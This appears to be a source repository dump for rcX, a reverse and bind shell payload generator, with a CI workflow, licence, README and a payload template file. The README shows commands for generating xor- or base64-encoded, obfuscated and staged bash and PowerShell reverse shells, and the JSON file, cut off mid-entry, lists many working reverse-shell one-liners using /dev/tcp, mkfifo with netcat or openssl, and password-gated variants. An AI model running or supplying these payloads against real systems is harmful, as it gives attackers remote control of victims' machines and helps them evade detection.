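├── .github └── workflows │ └── build.yml ├── .gitignore ├── LICENSE ├── README.md ├── index_template.html ├── payloads_template.json ├── payloads_template.yml ├── rcX-png ├── favicon.ico ├── logo.png ├── rcx-main.png ├── rcx-obf.png ├── rcx-online-curl.gif ├── rcx-staged.png ├── rcx-table.png ├── rcx-web-cli.png └── rcxonline.gif ├── rcX.py └── requirements.txt /.github/workflows/build.yml: --------------------------------------------------------------------------------
# CI workflow for rcX. The README shows this workflow's status as the "Build"
# badge, so the job should actually exercise the code rather than only echo.

name: Build

# Run on pushes and pull requests targeting main, plus manual dispatch.
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:

# Least privilege: the job only needs to read the checkout. Without an
# explicit permissions block the GITHUB_TOKEN gets the repository's default
# scope, which depends on repository settings and may be read/write.
permissions:
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      # checkout@v2 depends on a deprecated Node runtime; use a current major.
      # For a stronger supply-chain guarantee, pin third-party actions to a
      # full commit SHA instead of a mutable tag.
      - uses: actions/checkout@v4

      - uses: actions/setup-python@v5
        with:
          python-version: "3.x"

      # Mirrors the "Local use" instructions in the README.
      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt

      # Byte-compile the entry point so a syntax error fails the build.
      - name: Compile
        run: python -m py_compile rcX.py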
37 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 
92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | 131 | *.png binary -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. 
Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 
55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. 
You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. 
But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. 
(This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. 
These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 
214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. 
If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 
305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | , 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 
340 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | [![Build](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml/badge.svg)](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml) 3 | [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.6|3.7|3.8|3.9|3.10-green.svg?logo=python&logoColor=yellow)](https://www.python.org/) 4 | [![GitHub release](https://img.shields.io/github/v/tag/FlyfishSec/rcX.svg?label=release&color=green)](https://github.com/FlyfishSec/rcX/releases) 5 | [![GitHub downloads](https://img.shields.io/github/downloads/flyfishSec/rcX/total?color=cyan)](https://github.com/FlyfishSec/rcX/releases) 6 | [![License](https://img.shields.io/badge/license-GPLv2-red.svg?color=green)](https://cdn.rawgit.com/FlyfishSec/rcX/main/LICENSE) 7 | # [](https://github.com/FlyfishSec/rcX/releases) 8 | ## [rcxonline.cf](https://rcxonline.cf)/[rcxonline.ml](https://rcxonline.ml) 9 | 10 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcxonline.gif "rcX") 11 | 12 | ## curl 13 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-online-curl.gif) 14 | 15 | ## What is rcX? 16 | ### "rc" - stands for remote command or remote code. 17 | ### "X" - you can understand as assistant or tool. 18 | 19 | The predecessor of rcX is rsGen(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator. 20 | More features will be added in the future. 21 | 22 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-main.png "rcX") 23 | 24 | ## Local use 25 | `pip install -r requirements.txt` 26 | or Download the packaged binaries 27 | ### CLI Usage 28 | #### Example: 29 | ##### 1.Get a bash reverse shell and output in tabular format. 
30 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table` 31 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-table.png "rcX") 32 | ##### 2.Custom shell path. 33 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"` 34 | ##### 3.Copy the specified id payload to the clipboard. 35 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5` 36 | ##### 4.Get a base64 encoded bash reverse shell. 37 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64` 38 | ##### 5.Get a xor encoded and obfuscated bash reverse shell. 39 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7` 40 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-obf.png "rcX") 41 | ##### 6.Get a staging bash reverse shell. 42 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0` 43 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-staged.png "rcX") 44 | ##### 7.Get a staging bash reverse shell and forward local port using ngrok tunnel. 45 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp` 46 | ##### 8.Get a Windows Powershell reverse shell. 47 | `python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows` 48 | #### ... 49 | 50 | ### Web UI 51 | > At the same time, rcX also provides a web interface. 52 | Use rcX as a server then you can use it with your team or friends. 53 | 54 | > Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end 55 | 56 | #### Example: 57 | `python rcX.py -w` 58 | 59 | ### Web CLI 60 | > When rcX is running as a server, you can use curl in terminal to get the payload. 
61 | #### Example: 62 | ##### 1.Get a bash reverse shell payload 63 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888` 64 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-web-cli.png "rcX") 65 | ##### 2.Base64 encoded 66 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64` 67 | 68 | ##### 3.Base64 and hex encoded 69 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex` 70 | 71 | ##### 4.Gzip compress and replace_char(obfuscation method) 72 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char` 73 | 74 | ##### 5.xor encoded and reverse(obfuscation method) 75 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse` 76 | 77 | ##### 6.Get a Windows powershell reverse shell payload 78 | `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444` 79 | 80 | ##### 7.replace_char(obfuscation method) only without using encoder 81 | `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char` 82 | 83 | ##### 8.Only use staging, without any encoder and obfuscator 84 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1` 85 | 86 | ##### 9.Get a bind linux netcat shell payload 87 | `curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888` 88 | 89 | 90 | ## Support rcX 91 | 92 | |Bitcoin Address QR Code|Ethereum Address QR Code|Monero Address QR Code|DOGECOIN Address QR Code| 93 | |:--------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------:| 94 | | | | | | 95 | 96 | *BTC*: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF 97 | 98 | *ETH*: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED 99 | 100 | *XMR*: 
48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi 101 | 102 | *Dogecoin*: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if 103 | 104 | 105 | -------------------------------------------------------------------------------- /index_template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 63 | 64 | 65 | 66 |

rcX - Shell Generator

67 |
68 |
69 |
70 |
Host
71 | 72 |
Port
73 | 74 |
Shell Type
75 | 92 |
Platform
93 | 97 |
Password
98 | 99 | 100 |
101 |
102 |
103 |
Direction
104 | 108 |
Protocol
109 | 117 |
Shell Path
118 | 119 |
BinaryName
120 | 121 |
122 |
123 |
Interactive Mode
124 | 129 |
Encryption
130 | 135 |
StagingUrl
136 | 150 |
StagingCmd
151 | 168 |
169 |
170 |
Encoder
171 | 183 |
184 |
185 |
Obfuscator
186 | 191 |
IPObfuscator
192 | 198 |
localtunnel
199 | 210 |
211 |
212 |
213 |
214 |
Test Terminal
215 | 224 |
225 |
226 | 229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 | 269 |
270 | 271 | 272 | -------------------------------------------------------------------------------- /payloads_template.json: -------------------------------------------------------------------------------- 1 | { 2 | "reverse": { 3 | "bash": { 4 | "Bash-i": "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1", 5 | "Bash-l": "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1", 6 | "Bash-p": "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1", 7 | "Bash-c": "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'", 8 | "Bash196": "0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196", 9 | "Bash-readline": "exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do $line 2>&5 >&5; done", 10 | "Bash5": "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5", 11 | "zsh": "zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'" 12 | }, 13 | "bash-password": { 14 | "Bash-i": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1", 15 | "Bash-l": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1", 16 | "Bash-p": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 17 | }, 18 | "bash-ssl": { 19 | "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 20 | "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 21 | "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f" 22 | }, 23 | "bash-ssl-password": { 24 | "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' 
2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 25 | "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac' 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 26 | "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac' 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f" 27 | }, 28 | "netcat": { 29 | "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}", 30 | "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}", 31 | "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}", 32 | "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}", 33 | "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f", 34 | "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f", 35 | "DotnetCat": "dncat -e {shell_path} {host} -p {port}" 36 | }, 37 | "netcat-windows": { 38 | "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}", 39 | "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}", 40 | "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}", 41 | "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}", 42 | "DotnetCat": "dncat -e {shell_path} {host} -p {port}" 43 | }, 44 | "netcat-password": { 45 | "nc-c": "nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}", 46 | "ncat-c": "ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}", 47 | "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f", 48 | "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in \"{password}\")bash -i;esac' 2>&1|{binary_name} {host} 
